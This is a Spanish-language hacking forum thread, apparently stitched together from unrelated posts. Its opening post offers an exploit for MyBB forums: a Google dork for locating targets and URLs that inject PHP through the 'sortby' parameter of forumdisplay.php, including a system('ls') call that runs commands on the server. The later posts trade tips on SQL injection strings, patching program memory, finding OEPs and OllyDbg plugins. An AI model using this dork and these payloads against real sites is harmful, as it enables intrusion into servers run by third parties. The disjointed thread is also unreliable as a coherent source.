He descubierto un bug que afecta los foros hechos en MyBB recientes.
mi dork: inurl:"forumdisplay.php?fid=" +intext:"MyBB Group"

Exploit:

Sintaxis:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby=[exploit]

Ejemplos:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];phpinfo();exit;//

http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];system('ls');exit;//

by zion
Mi fuente.

mas un XXS para estudiar
Gracias por la informacion. 

A ver... no soy especialista en SQL injection pero si hablas de parametros creo que existe muchos metodos.

Un consejo, puedes mirar las opciones de algunos scanners donde figuran esas cadenas de prueba como por ejemplo /*, ' , etc. etc. que estan concatenados con los metodos SELECT y UPDATE.

Espero que te sirva el aporte

salud2

hola, quisiera preguntar algo, si es que existe un programa o bien, la posibilidad de hacer que manipule direcciones de memoria de un programa y concatenarlo con acciones de otro programa. Por ejemplo: abro NOTEPAD y al dar clic en nuevo que me ejecute PAINT. He intentado con el Snippet Creator de Izcelion junto con el masm pero aun es dificil porque son muchas direcciones de memoria y codigo assembler que manejar. Si alguien tiene alguna idea de como hacerlo agradeceria mucho..
Gracias

valio muchisimo, gracias...

dale camarada, te envio enseguida porque ahora estoy sin conexion a internet..

gracias...


saludos....

tienes razon, aunque siempre caigo en el intento de encontrar el OEP, pero sigo buscando gracias...

saludos...

vale, gracias camarada, se agradece mucho...

donde puedo conseguir plugins para ollydbg?
gracias

una ayudita con konxise